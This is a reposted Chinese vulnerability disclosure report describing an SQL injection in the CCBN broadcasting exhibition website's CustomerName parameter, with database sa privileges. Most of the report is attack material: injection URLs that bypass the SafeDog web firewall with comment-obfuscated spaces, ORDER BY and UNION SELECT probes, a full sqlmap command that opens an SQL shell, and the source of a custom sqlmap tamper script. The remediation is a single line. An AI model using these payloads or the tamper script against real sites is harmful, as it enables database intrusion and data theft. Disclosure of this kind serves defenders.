神刀安全网

漏洞标题: CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

漏洞详情

披露状态:

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-16: 厂商已经确认,细节仅向厂商公开
2016-04-26: 细节向核心白帽子及相关领域专家公开
2016-05-06: 细节向普通白帽子公开
2016-05-16: 细节向实习白帽子公开
2016-05-31: 细节向公众公开

简要描述:

习惯了,随手一个',就有这个漏洞。。。
自定义sqlmap脚本,可sql-shell

详细说明:

中国国际广播电视信息网络展览会 主站:

code 区域
http://**.**.**.**bn.tv/

介绍:http://**.**.**.**bn.tv/channels/4.html

漏洞url:

code 区域
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p
参数:CustomerName可注入

遇到狗:

code 区域
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27) and 1=user--

漏洞标题:  CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

绕过:

字段数:

code 区域
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*//*/order /*//*/by/*//*/71--

然后union

code 区域
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*//*/UNION/*//*/ SELECT/*//*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71--

漏洞标题:  CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

提示类型不匹配。。。

然后全部替换为NULL,报错

code 区域
输入字符串的格式不正确

code 区域
http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p%27)/*//*/UNION/*//*/ SELECT/*//*/NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

漏洞标题:  CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

字段太多,需要去对应探测,但是有可能是多个NULL,所以直接用SQLMap去跑,需要自定sqlmap脚本

然后就有如下语句:

code 区域
sqlmap.py --batch -u "http://**.**.**.**bn.tv/CCBN/ExhibitionOnline.aspx?TypeID=&HallID=&CustomerName=p" -p CustomerName --prefix "%27)/*//*/" --suffix "--" --tamper "tamper/space2myscript.py" --current-user --dbs --sql-shell

漏洞标题:  CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

仅做证明,未深入。。。

========================================================

space2myscript.py脚本:

code 区域
#!/usr/bin/env python
"""
developers (goubuli)

"""
import random
import string

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def tamper(payload, **kwargs):

retVal = ""

if payload:
for i in xrange(len(payload)):
if payload[i].isspace():
retVal += "/*//*/"
elif payload[i] == '#' or payload[i:i + 3] == '-- ':
retVal += payload[i:]
break
else:
retVal += payload[i]

return retVal

漏洞证明:

如上

修复方案:

程序内部对参数过滤

版权声明:转载请注明来源 goubuli@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: CCBN WWW主站SQL注入/sa权限(绕过安全狗/附sqlmap脚本)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址